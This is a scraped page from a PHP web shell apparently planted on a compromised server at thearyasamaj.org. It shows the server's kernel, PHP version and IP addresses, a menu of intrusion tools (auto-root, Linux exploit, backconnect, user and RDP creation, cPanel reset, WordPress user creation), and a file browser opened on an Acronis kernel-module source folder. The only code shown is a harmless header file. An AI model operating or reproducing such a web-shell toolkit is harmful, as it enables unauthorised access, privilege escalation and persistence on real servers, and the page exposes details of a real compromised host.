Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.222
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
src /
snapapi26-0.8.17 /
[ HOME SHELL ]
Name
Size
Permission
Action
Makefile
10.64
KB
-rw-r--r--
dkms.conf
432
B
-rw-r--r--
sn_huge_ptr.h
513
B
-rw-r--r--
snapapi.h
8.42
KB
-rw-r--r--
snapapi26.c
139.3
KB
-rw-r--r--
snapapi_genconfig.sh
2.54
KB
-rwxr-xr-x
snumbd.h
3.14
KB
-rw-r--r--
snumbd26.c
37.43
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sn_huge_ptr.h
/* Copyright (C) Acronis, 2004-2006 Written by Vladimir Simonov $Id$ */ #ifndef SN_HUGE_PTR_H_INCLUDED #define SN_HUGE_PTR_H_INCLUDED #ifdef _LP64 #define SN_HUGE_PTR(ptr) ptr #define SN_HUGE_PTR2(ptr) ptr #else #ifdef __BIG_ENDIAN__ #define SN_HUGE_PTR(ptr) unsigned pad; ptr #define SN_HUGE_PTR2(ptr) unsigned pad2; ptr #else #define SN_HUGE_PTR(ptr) ptr; unsigned pad #define SN_HUGE_PTR2(ptr) ptr; unsigned pad2 #endif /* __BIG_ENDIAN__ */ #endif /* _LP64 */ #endif /* SN_HUGE_PTR_H_INCLUDED */
Close